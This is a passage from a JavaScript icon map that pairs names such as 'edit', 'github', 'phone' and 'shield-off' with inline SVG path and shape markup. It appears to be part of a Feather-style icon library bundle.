dribbble: '<circle cx="12" cy="12" r="10"></circle><path d="M8.56 2.75c4.37 6.03 6.02 9.42 8.03 17.72m2.54-15.38c-3.72 4.35-8.94 5.66-16.88 5.85m19.5 1.9c-3.5-.93-6.63-.82-8.94 0-2.58.92-5.01 2.86-7.44 6.32"></path>',
droplet: '<path d="M12 2.69l5.66 5.66a8 8 0 1 1-11.31 0z"></path>',
"edit-2": '<path d="M17 3a2.828 2.828 0 1 1 4 4L7.5 20.5 2 22l1.5-5.5L17 3z"></path>',
"edit-3": '<path d="M12 20h9"></path><path d="M16.5 3.5a2.121 2.121 0 0 1 3 3L7 19l-4 1 1-4L16.5 3.5z"></path>',
edit: '<path d="M11 4H4a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2v-7"></path><path d="M18.5 2.5a2.121 2.121 0 0 1 3 3L12 15l-4 1 1-4 9.5-9.5z"></path>',
"external-link": '<path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path><polyline points="15 3 21 3 21 9"></polyline><line x1="10" y1="14" x2="21" y2="3"></line>',
"eye-off": '<path d="M17.94 17.94A10.07 10.07 0 0 1 12 20c-7 0-11-8-11-8a18.45 18.45 0 0 1 5.06-5.94M9.9 4.24A9.12 9.12 0 0 1 12 4c7 0 11 8 11 8a18.5 18.5 0 0 1-2.16 3.19m-6.72-1.07a3 3 0 1 1-4.24-4.24"></path><line x1="1" y1="1" x2="23" y2="23"></line>',
eye: '<path d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z"></path><circle cx="12" cy="12" r="3"></circle>',
facebook: '<path d="M18 2h-3a5 5 0 0 0-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 0 1 1-1h3z"></path>',
"fast-forward": '<polygon points="13 19 22 12 13 5 13 19"></polygon><polygon points="2 19 11 12 2 5 2 19"></polygon>',
feather: '<path d="M20.24 12.24a6 6 0 0 0-8.49-8.49L5 10.5V19h8.5z"></path><line x1="16" y1="8" x2="2" y2="22"></line><line x1="17.5" y1="15" x2="9" y2="15"></line>',
figma: '<path d="M5 5.5A3.5 3.5 0 0 1 8.5 2H12v7H8.5A3.5 3.5 0 0 1 5 5.5z"></path><path d="M12 2h3.5a3.5 3.5 0 1 1 0 7H12V2z"></path><path d="M12 12.5a3.5 3.5 0 1 1 7 0 3.5 3.5 0 1 1-7 0z"></path><path d="M5 19.5A3.5 3.5 0 0 1 8.5 16H12v3.5a3.5 3.5 0 1 1-7 0z"></path><path d="M5 12.5A3.5 3.5 0 0 1 8.5 9H12v7H8.5A3.5 3.5 0 0 1 5 12.5z"></path>',
"file-minus": '<path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline><line x1="9" y1="15" x2="15" y2="15"></line>',
"file-plus": '<path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline><line x1="12" y1="18" x2="12" y2="12"></line><line x1="9" y1="15" x2="15" y2="15"></line>',
"file-text": '<path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline><line x1="16" y1="13" x2="8" y2="13"></line><line x1="16" y1="17" x2="8" y2="17"></line><polyline points="10 9 9 9 8 9"></polyline>',
file: '<path d="M13 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V9z"></path><polyline points="13 2 13 9 20 9"></polyline>',
film: '<rect x="2" y="2" width="20" height="20" rx="2.18" ry="2.18"></rect><line x1="7" y1="2" x2="7" y2="22"></line><line x1="17" y1="2" x2="17" y2="22"></line><line x1="2" y1="12" x2="22" y2="12"></line><line x1="2" y1="7" x2="7" y2="7"></line><line x1="2" y1="17" x2="7" y2="17"></line><line x1="17" y1="17" x2="22" y2="17"></line><line x1="17" y1="7" x2="22" y2="7"></line>',
filter: '<polygon points="22 3 2 3 10 12.46 10 19 14 21 14 12.46 22 3"></polygon>',
flag: '<path d="M4 15s1-1 4-1 5 2 8 2 4-1 4-1V3s-1 1-4 1-5-2-8-2-4 1-4 1z"></path><line x1="4" y1="22" x2="4" y2="15"></line>',
"folder-minus": '<path d="M22 19a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h5l2 3h9a2 2 0 0 1 2 2z"></path><line x1="9" y1="14" x2="15" y2="14"></line>',
"folder-plus": '<path d="M22 19a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h5l2 3h9a2 2 0 0 1 2 2z"></path><line x1="12" y1="11" x2="12" y2="17"></line><line x1="9" y1="14" x2="15" y2="14"></line>',
folder: '<path d="M22 19a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h5l2 3h9a2 2 0 0 1 2 2z"></path>',
framer: '<path d="M5 16V9h14V2H5l14 14h-7m-7 0l7 7v-7m-7 0h7"></path>',
frown: '<circle cx="12" cy="12" r="10"></circle><path d="M16 16s-1.5-2-4-2-4 2-4 2"></path><line x1="9" y1="9" x2="9.01" y2="9"></line><line x1="15" y1="9" x2="15.01" y2="9"></line>',
gift: '<polyline points="20 12 20 22 4 22 4 12"></polyline><rect x="2" y="7" width="20" height="5"></rect><line x1="12" y1="22" x2="12" y2="7"></line><path d="M12 7H7.5a2.5 2.5 0 0 1 0-5C11 2 12 7 12 7z"></path><path d="M12 7h4.5a2.5 2.5 0 0 0 0-5C13 2 12 7 12 7z"></path>',
"git-branch": '<line x1="6" y1="3" x2="6" y2="15"></line><circle cx="18" cy="6" r="3"></circle><circle cx="6" cy="18" r="3"></circle><path d="M18 9a9 9 0 0 1-9 9"></path>',
"git-commit": '<circle cx="12" cy="12" r="4"></circle><line x1="1.05" y1="12" x2="7" y2="12"></line><line x1="17.01" y1="12" x2="22.96" y2="12"></line>',
"git-merge": '<circle cx="18" cy="18" r="3"></circle><circle cx="6" cy="6" r="3"></circle><path d="M6 21V9a9 9 0 0 0 9 9"></path>',
"git-pull-request": '<circle cx="18" cy="18" r="3"></circle><circle cx="6" cy="6" r="3"></circle><path d="M13 6h3a2 2 0 0 1 2 2v7"></path><line x1="6" y1="9" x2="6" y2="21"></line>',
github: '<path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>',
gitlab: '<path d="M22.65 14.39L12 22.13 1.35 14.39a.84.84 0 0 1-.3-.94l1.22-3.78 2.44-7.51A.42.42 0 0 1 4.82 2a.43.43 0 0 1 .58 0 .42.42 0 0 1 .11.18l2.44 7.49h8.1l2.44-7.51A.42.42 0 0 1 18.6 2a.43.43 0 0 1 .58 0 .42.42 0 0 1 .11.18l2.44 7.51L23 13.45a.84.84 0 0 1-.35.94z"></path>',
globe: '<circle cx="12" cy="12" r="10"></circle><line x1="2" y1="12" x2="22" y2="12"></line><path d="M12 2a15.3 15.3 0 0 1 4 10 15.3 15.3 0 0 1-4 10 15.3 15.3 0 0 1-4-10 15.3 15.3 0 0 1 4-10z"></path>',
grid: '<rect x="3" y="3" width="7" height="7"></rect><rect x="14" y="3" width="7" height="7"></rect><rect x="14" y="14" width="7" height="7"></rect><rect x="3" y="14" width="7" height="7"></rect>',
"hard-drive": '<line x1="22" y1="12" x2="2" y2="12"></line><path d="M5.45 5.11L2 12v6a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2v-6l-3.45-6.89A2 2 0 0 0 16.76 4H7.24a2 2 0 0 0-1.79 1.11z"></path><line x1="6" y1="16" x2="6.01" y2="16"></line><line x1="10" y1="16" x2="10.01" y2="16"></line>',
hash: '<line x1="4" y1="9" x2="20" y2="9"></line><line x1="4" y1="15" x2="20" y2="15"></line><line x1="10" y1="3" x2="8" y2="21"></line><line x1="16" y1="3" x2="14" y2="21"></line>',
headphones: '<path d="M3 18v-6a9 9 0 0 1 18 0v6"></path><path d="M21 19a2 2 0 0 1-2 2h-1a2 2 0 0 1-2-2v-3a2 2 0 0 1 2-2h3zM3 19a2 2 0 0 0 2 2h1a2 2 0 0 0 2-2v-3a2 2 0 0 0-2-2H3z"></path>',
heart: '<path d="M20.84 4.61a5.5 5.5 0 0 0-7.78 0L12 5.67l-1.06-1.06a5.5 5.5 0 0 0-7.78 7.78l1.06 1.06L12 21.23l7.78-7.78 1.06-1.06a5.5 5.5 0 0 0 0-7.78z"></path>',
"help-circle": '<circle cx="12" cy="12" r="10"></circle><path d="M9.09 9a3 3 0 0 1 5.83 1c0 2-3 3-3 3"></path><line x1="12" y1="17" x2="12.01" y2="17"></line>',
hexagon: '<path d="M21 16V8a2 2 0 0 0-1-1.73l-7-4a2 2 0 0 0-2 0l-7 4A2 2 0 0 0 3 8v8a2 2 0 0 0 1 1.73l7 4a2 2 0 0 0 2 0l7-4A2 2 0 0 0 21 16z"></path>',
home: '<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path><polyline points="9 22 9 12 15 12 15 22"></polyline>',
image: '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><circle cx="8.5" cy="8.5" r="1.5"></circle><polyline points="21 15 16 10 5 21"></polyline>',
inbox: '<polyline points="22 12 16 12 14 15 10 15 8 12 2 12"></polyline><path d="M5.45 5.11L2 12v6a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2v-6l-3.45-6.89A2 2 0 0 0 16.76 4H7.24a2 2 0 0 0-1.79 1.11z"></path>',
info: '<circle cx="12" cy="12" r="10"></circle><line x1="12" y1="16" x2="12" y2="12"></line><line x1="12" y1="8" x2="12.01" y2="8"></line>',
instagram: '<rect x="2" y="2" width="20" height="20" rx="5" ry="5"></rect><path d="M16 11.37A4 4 0 1 1 12.63 8 4 4 0 0 1 16 11.37z"></path><line x1="17.5" y1="6.5" x2="17.51" y2="6.5"></line>',
italic: '<line x1="19" y1="4" x2="10" y2="4"></line><line x1="14" y1="20" x2="5" y2="20"></line><line x1="15" y1="4" x2="9" y2="20"></line>',
key: '<path d="M21 2l-2 2m-7.61 7.61a5.5 5.5 0 1 1-7.778 7.778 5.5 5.5 0 0 1 7.777-7.777zm0 0L15.5 7.5m0 0l3 3L22 7l-3-3m-3.5 3.5L19 4"></path>',
layers: '<polygon points="12 2 2 7 12 12 22 7 12 2"></polygon><polyline points="2 17 12 22 22 17"></polyline><polyline points="2 12 12 17 22 12"></polyline>',
layout: '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="3" y1="9" x2="21" y2="9"></line><line x1="9" y1="21" x2="9" y2="9"></line>',
"life-buoy": '<circle cx="12" cy="12" r="10"></circle><circle cx="12" cy="12" r="4"></circle><line x1="4.93" y1="4.93" x2="9.17" y2="9.17"></line><line x1="14.83" y1="14.83" x2="19.07" y2="19.07"></line><line x1="14.83" y1="9.17" x2="19.07" y2="4.93"></line><line x1="14.83" y1="9.17" x2="18.36" y2="5.64"></line><line x1="4.93" y1="19.07" x2="9.17" y2="14.83"></line>',
"link-2": '<path d="M15 7h3a5 5 0 0 1 5 5 5 5 0 0 1-5 5h-3m-6 0H6a5 5 0 0 1-5-5 5 5 0 0 1 5-5h3"></path><line x1="8" y1="12" x2="16" y2="12"></line>',
link: '<path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path><path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path>',
linkedin: '<path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6z"></path><rect x="2" y="9" width="4" height="12"></rect><circle cx="4" cy="4" r="2"></circle>',
list: '<line x1="8" y1="6" x2="21" y2="6"></line><line x1="8" y1="12" x2="21" y2="12"></line><line x1="8" y1="18" x2="21" y2="18"></line><line x1="3" y1="6" x2="3.01" y2="6"></line><line x1="3" y1="12" x2="3.01" y2="12"></line><line x1="3" y1="18" x2="3.01" y2="18"></line>',
loader: '<line x1="12" y1="2" x2="12" y2="6"></line><line x1="12" y1="18" x2="12" y2="22"></line><line x1="4.93" y1="4.93" x2="7.76" y2="7.76"></line><line x1="16.24" y1="16.24" x2="19.07" y2="19.07"></line><line x1="2" y1="12" x2="6" y2="12"></line><line x1="18" y1="12" x2="22" y2="12"></line><line x1="4.93" y1="19.07" x2="7.76" y2="16.24"></line><line x1="16.24" y1="7.76" x2="19.07" y2="4.93"></line>',
lock: '<rect x="3" y="11" width="18" height="11" rx="2" ry="2"></rect><path d="M7 11V7a5 5 0 0 1 10 0v4"></path>',
"log-in": '<path d="M15 3h4a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2h-4"></path><polyline points="10 17 15 12 10 7"></polyline><line x1="15" y1="12" x2="3" y2="12"></line>',
"log-out": '<path d="M9 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h4"></path><polyline points="16 17 21 12 16 7"></polyline><line x1="21" y1="12" x2="9" y2="12"></line>',
mail: '<path d="M4 4h16c1.1 0 2 .9 2 2v12c0 1.1-.9 2-2 2H4c-1.1 0-2-.9-2-2V6c0-1.1.9-2 2-2z"></path><polyline points="22,6 12,13 2,6"></polyline>',
"map-pin": '<path d="M21 10c0 7-9 13-9 13s-9-6-9-13a9 9 0 0 1 18 0z"></path><circle cx="12" cy="10" r="3"></circle>',
map: '<polygon points="1 6 1 22 8 18 16 22 23 18 23 2 16 6 8 2 1 6"></polygon><line x1="8" y1="2" x2="8" y2="18"></line><line x1="16" y1="6" x2="16" y2="22"></line>',
"maximize-2": '<polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" y1="3" x2="14" y2="10"></line><line x1="3" y1="21" x2="10" y2="14"></line>',
maximize: '<path d="M8 3H5a2 2 0 0 0-2 2v3m18 0V5a2 2 0 0 0-2-2h-3m0 18h3a2 2 0 0 0 2-2v-3M3 16v3a2 2 0 0 0 2 2h3"></path>',
meh: '<circle cx="12" cy="12" r="10"></circle><line x1="8" y1="15" x2="16" y2="15"></line><line x1="9" y1="9" x2="9.01" y2="9"></line><line x1="15" y1="9" x2="15.01" y2="9"></line>',
menu: '<line x1="3" y1="12" x2="21" y2="12"></line><line x1="3" y1="6" x2="21" y2="6"></line><line x1="3" y1="18" x2="21" y2="18"></line>',
"message-circle": '<path d="M21 11.5a8.38 8.38 0 0 1-.9 3.8 8.5 8.5 0 0 1-7.6 4.7 8.38 8.38 0 0 1-3.8-.9L3 21l1.9-5.7a8.38 8.38 0 0 1-.9-3.8 8.5 8.5 0 0 1 4.7-7.6 8.38 8.38 0 0 1 3.8-.9h.5a8.48 8.48 0 0 1 8 8v.5z"></path>',
"message-square": '<path d="M21 15a2 2 0 0 1-2 2H7l-4 4V5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2z"></path>',
"mic-off": '<line x1="1" y1="1" x2="23" y2="23"></line><path d="M9 9v3a3 3 0 0 0 5.12 2.12M15 9.34V4a3 3 0 0 0-5.94-.6"></path><path d="M17 16.95A7 7 0 0 1 5 12v-2m14 0v2a7 7 0 0 1-.11 1.23"></path><line x1="12" y1="19" x2="12" y2="23"></line><line x1="8" y1="23" x2="16" y2="23"></line>',
mic: '<path d="M12 1a3 3 0 0 0-3 3v8a3 3 0 0 0 6 0V4a3 3 0 0 0-3-3z"></path><path d="M19 10v2a7 7 0 0 1-14 0v-2"></path><line x1="12" y1="19" x2="12" y2="23"></line><line x1="8" y1="23" x2="16" y2="23"></line>',
"minimize-2": '<polyline points="4 14 10 14 10 20"></polyline><polyline points="20 10 14 10 14 4"></polyline><line x1="14" y1="10" x2="21" y2="3"></line><line x1="3" y1="21" x2="10" y2="14"></line>',
minimize: '<path d="M8 3v3a2 2 0 0 1-2 2H3m18 0h-3a2 2 0 0 1-2-2V3m0 18v-3a2 2 0 0 1 2-2h3M3 16h3a2 2 0 0 1 2 2v3"></path>',
"minus-circle": '<circle cx="12" cy="12" r="10"></circle><line x1="8" y1="12" x2="16" y2="12"></line>',
"minus-square": '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="8" y1="12" x2="16" y2="12"></line>',
minus: '<line x1="5" y1="12" x2="19" y2="12"></line>',
monitor: '<rect x="2" y="3" width="20" height="14" rx="2" ry="2"></rect><line x1="8" y1="21" x2="16" y2="21"></line><line x1="12" y1="17" x2="12" y2="21"></line>',
moon: '<path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path>',
"more-horizontal": '<circle cx="12" cy="12" r="1"></circle><circle cx="19" cy="12" r="1"></circle><circle cx="5" cy="12" r="1"></circle>',
"more-vertical": '<circle cx="12" cy="12" r="1"></circle><circle cx="12" cy="5" r="1"></circle><circle cx="12" cy="19" r="1"></circle>',
"mouse-pointer": '<path d="M3 3l7.07 16.97 2.51-7.39 7.39-2.51L3 3z"></path><path d="M13 13l6 6"></path>',
move: '<polyline points="5 9 2 12 5 15"></polyline><polyline points="9 5 12 2 15 5"></polyline><polyline points="15 19 12 22 9 19"></polyline><polyline points="19 9 22 12 19 15"></polyline><line x1="2" y1="12" x2="22" y2="12"></line><line x1="12" y1="2" x2="12" y2="22"></line>',
music: '<path d="M9 18V5l12-2v13"></path><circle cx="6" cy="18" r="3"></circle><circle cx="18" cy="16" r="3"></circle>',
"navigation-2": '<polygon points="12 2 19 21 12 17 5 21 12 2"></polygon>',
navigation: '<polygon points="3 11 22 2 13 21 11 13 3 11"></polygon>',
octagon: '<polygon points="7.86 2 16.14 2 22 7.86 22 16.14 16.14 22 7.86 22 2 16.14 2 7.86 7.86 2"></polygon>',
package: '<line x1="16.5" y1="9.4" x2="7.5" y2="4.21"></line><path d="M21 16V8a2 2 0 0 0-1-1.73l-7-4a2 2 0 0 0-2 0l-7 4A2 2 0 0 0 3 8v8a2 2 0 0 0 1 1.73l7 4a2 2 0 0 0 2 0l7-4A2 2 0 0 0 21 16z"></path><polyline points="3.27 6.96 12 12.01 20.73 6.96"></polyline><line x1="12" y1="22.08" x2="12" y2="12"></line>',
paperclip: '<path d="M21.44 11.05l-9.19 9.19a6 6 0 0 1-8.49-8.49l9.19-9.19a4 4 0 0 1 5.66 5.66l-9.2 9.19a2 2 0 0 1-2.83-2.83l8.49-8.48"></path>',
"pause-circle": '<circle cx="12" cy="12" r="10"></circle><line x1="10" y1="15" x2="10" y2="9"></line><line x1="14" y1="15" x2="14" y2="9"></line>',
pause: '<rect x="6" y="4" width="4" height="16"></rect><rect x="14" y="4" width="4" height="16"></rect>',
"pen-tool": '<path d="M12 19l7-7 3 3-7 7-3-3z"></path><path d="M18 13l-1.5-7.5L2 2l3.5 14.5L13 18l5-5z"></path><path d="M2 2l7.586 7.586"></path><circle cx="11" cy="11" r="2"></circle>',
percent: '<line x1="19" y1="5" x2="5" y2="19"></line><circle cx="6.5" cy="6.5" r="2.5"></circle><circle cx="17.5" cy="17.5" r="2.5"></circle>',
"phone-call": '<path d="M15.05 5A5 5 0 0 1 19 8.95M15.05 1A9 9 0 0 1 23 8.94m-1 7.98v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
"phone-forwarded": '<polyline points="19 1 23 5 19 9"></polyline><line x1="15" y1="5" x2="23" y2="5"></line><path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
"phone-incoming": '<polyline points="16 2 16 8 22 8"></polyline><line x1="23" y1="1" x2="16" y2="8"></line><path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
"phone-missed": '<line x1="23" y1="1" x2="17" y2="7"></line><line x1="17" y1="1" x2="23" y2="7"></line><path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
"phone-off": '<path d="M10.68 13.31a16 16 0 0 0 3.41 2.6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7 2 2 0 0 1 1.72 2v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.42 19.42 0 0 1-3.33-2.67m-2.67-3.34a19.79 19.79 0 0 1-3.07-8.63A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91"></path><line x1="23" y1="1" x2="1" y2="23"></line>',
"phone-outgoing": '<polyline points="23 7 23 1 17 1"></polyline><line x1="16" y1="8" x2="23" y2="1"></line><path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
phone: '<path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
"pie-chart": '<path d="M21.21 15.89A10 10 0 1 1 8 2.83"></path><path d="M22 12A10 10 0 0 0 12 2v10z"></path>',
"play-circle": '<circle cx="12" cy="12" r="10"></circle><polygon points="10 8 16 12 10 16 10 8"></polygon>',
play: '<polygon points="5 3 19 12 5 21 5 3"></polygon>',
"plus-circle": '<circle cx="12" cy="12" r="10"></circle><line x1="12" y1="8" x2="12" y2="16"></line><line x1="8" y1="12" x2="16" y2="12"></line>',
"plus-square": '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="12" y1="8" x2="12" y2="16"></line><line x1="8" y1="12" x2="16" y2="12"></line>',
plus: '<line x1="12" y1="5" x2="12" y2="19"></line><line x1="5" y1="12" x2="19" y2="12"></line>',
pocket: '<path d="M4 3h16a2 2 0 0 1 2 2v6a10 10 0 0 1-10 10A10 10 0 0 1 2 11V5a2 2 0 0 1 2-2z"></path><polyline points="8 10 12 14 16 10"></polyline>',
power: '<path d="M18.36 6.64a9 9 0 1 1-12.73 0"></path><line x1="12" y1="2" x2="12" y2="12"></line>',
printer: '<polyline points="6 9 6 2 18 2 18 9"></polyline><path d="M6 18H4a2 2 0 0 1-2-2v-5a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v5a2 2 0 0 1-2 2h-2"></path><rect x="6" y="14" width="12" height="8"></rect>',
radio: '<circle cx="12" cy="12" r="2"></circle><path d="M16.24 7.76a6 6 0 0 1 0 8.49m-8.48-.01a6 6 0 0 1 0-8.49m11.31-2.82a10 10 0 0 1 0 14.14m-14.14 0a10 10 0 0 1 0-14.14"></path>',
"refresh-ccw": '<polyline points="1 4 1 10 7 10"></polyline><polyline points="23 20 23 14 17 14"></polyline><path d="M20.49 9A9 9 0 0 0 5.64 5.64L1 10m22 4l-4.64 4.36A9 9 0 0 1 3.51 15"></path>',
"refresh-cw": '<polyline points="23 4 23 10 17 10"></polyline><polyline points="1 20 1 14 7 14"></polyline><path d="M3.51 9a9 9 0 0 1 14.85-3.36L23 10M1 14l4.64 4.36A9 9 0 0 0 20.49 15"></path>',
repeat: '<polyline points="17 1 21 5 17 9"></polyline><path d="M3 11V9a4 4 0 0 1 4-4h14"></path><polyline points="7 23 3 19 7 15"></polyline><path d="M21 13v2a4 4 0 0 1-4 4H3"></path>',
rewind: '<polygon points="11 19 2 12 11 5 11 19"></polygon><polygon points="22 19 13 12 22 5 22 19"></polygon>',
"rotate-ccw": '<polyline points="1 4 1 10 7 10"></polyline><path d="M3.51 15a9 9 0 1 0 2.13-9.36L1 10"></path>',
"rotate-cw": '<polyline points="23 4 23 10 17 10"></polyline><path d="M20.49 15a9 9 0 1 1-2.12-9.36L23 10"></path>',
rss: '<path d="M4 11a9 9 0 0 1 9 9"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle>',
save: '<path d="M19 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h11l5 5v11a2 2 0 0 1-2 2z"></path><polyline points="17 21 17 13 7 13 7 21"></polyline><polyline points="7 3 7 8 15 8"></polyline>',
scissors: '<circle cx="6" cy="6" r="3"></circle><circle cx="6" cy="18" r="3"></circle><line x1="20" y1="4" x2="8.12" y2="15.88"></line><line x1="14.47" y1="14.48" x2="20" y2="20"></line><line x1="8.12" y1="8.12" x2="12" y2="12"></line>',
search: '<circle cx="11" cy="11" r="8"></circle><line x1="21" y1="21" x2="16.65" y2="16.65"></line>',
send: '<line x1="22" y1="2" x2="11" y2="13"></line><polygon points="22 2 15 22 11 13 2 9 22 2"></polygon>',
server: '<rect x="2" y="2" width="20" height="8" rx="2" ry="2"></rect><rect x="2" y="14" width="20" height="8" rx="2" ry="2"></rect><line x1="6" y1="6" x2="6.01" y2="6"></line><line x1="6" y1="18" x2="6.01" y2="18"></line>',
settings: '<circle cx="12" cy="12" r="3"></circle><path d="M19.4 15a1.65 1.65 0 0 0 .33 1.82l.06.06a2 2 0 0 1 0 2.83 2 2 0 0 1-2.83 0l-.06-.06a1.65 1.65 0 0 0-1.82-.33 1.65 1.65 0 0 0-1 1.51V21a2 2 0 0 1-2 2 2 2 0 0 1-2-2v-.09A1.65 1.65 0 0 0 9 19.4a1.65 1.65 0 0 0-1.82.33l-.06.06a2 2 0 0 1-2.83 0 2 2 0 0 1 0-2.83l.06-.06a1.65 1.65 0 0 0 .33-1.82 1.65 1.65 0 0 0-1.51-1H3a2 2 0 0 1-2-2 2 2 0 0 1 2-2h.09A1.65 1.65 0 0 0 4.6 9a1.65 1.65 0 0 0-.33-1.82l-.06-.06a2 2 0 0 1 0-2.83 2 2 0 0 1 2.83 0l.06.06a1.65 1.65 0 0 0 1.82.33H9a1.65 1.65 0 0 0 1-1.51V3a2 2 0 0 1 2-2 2 2 0 0 1 2 2v.09a1.65 1.65 0 0 0 1 1.51 1.65 1.65 0 0 0 1.82-.33l.06-.06a2 2 0 0 1 2.83 0 2 2 0 0 1 0 2.83l-.06.06a1.65 1.65 0 0 0-.33 1.82V9a1.65 1.65 0 0 0 1.51 1H21a2 2 0 0 1 2 2 2 2 0 0 1-2 2h-.09a1.65 1.65 0 0 0-1.51 1z"></path>',
"share-2": '<circle cx="18" cy="5" r="3"></circle><circle cx="6" cy="12" r="3"></circle><circle cx="18" cy="19" r="3"></circle><line x1="8.59" y1="13.51" x2="15.42" y2="17.49"></line><line x1="15.41" y1="6.51" x2="8.59" y2="10.49"></line>',
share: '<path d="M4 12v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2v-8"></path><polyline points="16 6 12 2 8 6"></polyline><line x1="12" y1="2" x2="12" y2="15"></line>',
"shield-off": '<path d="M19.69 14a6.9 6.9 0 0 0 .31-2V5l-8-3-3.16 1.18"></path><path d="M4.73 4.73L4 5v7c0 6 8 10 8 10a20.29 20.29 0 0 0 5.62-4.38"></path><line x1="1" y1="1" x2="23" y2="23"></line>',
